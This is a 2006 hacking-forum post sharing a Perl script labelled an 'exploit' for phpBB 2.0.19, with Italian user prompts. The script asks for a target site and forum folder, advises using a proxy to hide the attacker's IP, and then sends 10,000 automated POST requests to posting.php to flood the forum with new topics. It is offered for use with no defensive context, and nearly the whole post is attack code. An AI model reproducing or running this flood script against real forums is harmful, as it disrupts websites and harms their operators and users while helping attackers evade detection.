
10.03.2006, 21:17
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме: 438995
Репутация:
17
|
|
exploit phpBB 2.0.19 ( by SpiderZ )
работает отлично!
Код:
#!/usr/bin/perl
print q{
_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Topic infinitely exploit
=> Sito: www.spiderz.tk
_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
};
use IO::Socket;
## Initialized X
$x = 0;
## Exploit phpbb 2.0.19 SpiderZ
print q(
Exploit phpBB 2.0.19 ( by SpiderZ )
);
print q(
=> Scrivi l'url del sito senza aggiungere http & www
=> Url: );
$host = <STDIN>;
chop ($host);
print q(
=> Adesso indica in quale cartella e posto il phpbb
=> di solito si trova su /phpBB2/ o /forum/
=> Cartella: );
$pth = <STDIN>;
chop ($pth);
print q(
=> Occhio usa un proxy prima di effettuare l'attacco
=> il tuo ip verra spammato sul pannello admin del forum
=> Per avviare l'exploit scrivi " hacking "
=> );
$type = <STDIN>;
chop ($type);
## Search exploit phpbb by SpiderZ
if($type == 1){
## Search exploit phpbb by SpiderZ
while($x != 0000)
{
## Search exploit phpbb by SpiderZ
$x++;
}
## Nome attack Hacking
}
elsif ($type == hacking){
## Search exploit phpbb by SpiderZ
while($x != 10000)
{
## Invia Search exploit phpbb by SpiderZ
$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nConnessione non riuscita: $!\n" unless $sock;
## Invia Search exploit phpbb by SpiderZ
print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## exploit phpbb by SpiderZ
syswrite STDOUT, ".";
## exploit phpbb by SpiderZ
$x++;
}
}else{
## Error Exploit phpbb
die "
Error ! riprova...
\n";
}
|
|
|